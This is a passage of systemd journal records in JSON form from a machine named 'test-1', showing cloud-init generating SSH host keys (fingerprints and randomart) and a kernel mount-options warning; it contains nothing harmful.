"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b8;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=b5ce2a231b940b45", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| E .. + |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2b9;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=add86eb92dc43132", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| +....+.o o +|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ba;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2ef7cc08ed3fac95", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| + =o o.+ * *+|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bb;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=4aa22db2063ddc55", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| O . . = * B|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bc;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=28e3fbd75f74d823", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| o o. .o.=.o.|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bd;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2be;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d7c073cdcdbf46d6", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private ed25519 key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2bf;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8539d8794592c42b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_ed25519_key." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c0;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=a04169e245d150cc", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_ed25519_key.pub." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c1;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c2;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=345a32106e197585", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:LGSFwDAA7B9jve87IoPLkG3UGaAwTRLkJQeTPTX2mWw root@test-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c3;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c4;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d5b5481a3afeba41", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+--[ED25519 256]--+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c5;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=3e5a8ac5210aedd6", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|@XO=o= .. |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c6;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=f5fbc907c61aa5b1", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o**=o =.o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c7;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=b7315a6e7d8d6822", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o. + oE |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c8;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=198e39844a6fea32", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . = *.. |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c9;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=c32fc07777cefd49", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| + = o S |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ca;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8336df269661001a", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| + . . . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cb;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=1ca725f94f5f57a0", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o + . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cc;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=60dd92c320805416", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|oo o . o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cd;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=92ed6654ceb9e458", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| o. o ooo |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ce;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cf;b=e2b08827b5804427b422c10c84f1567e;m=2a5be59;t=5bd16df693dc1;x=a21ce3aac33b82b6", "__REALTIME_TIMESTAMP" : "1615280818699713", "__MONOTONIC_TIMESTAMP" : "44416601", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "43924614", "MESSAGE" : "new mount options do not match the existing superblock, will be ignored" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d0;b=e2b08827b5804427b422c10c84f1567e;m=2a5bff9;t=5bd16df693f60;x=edb88feae3407441", "__REALTIME_TIMESTAMP" : "1615280818700128", "__MONOTONIC_TIMESTAMP" : "44417017", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", 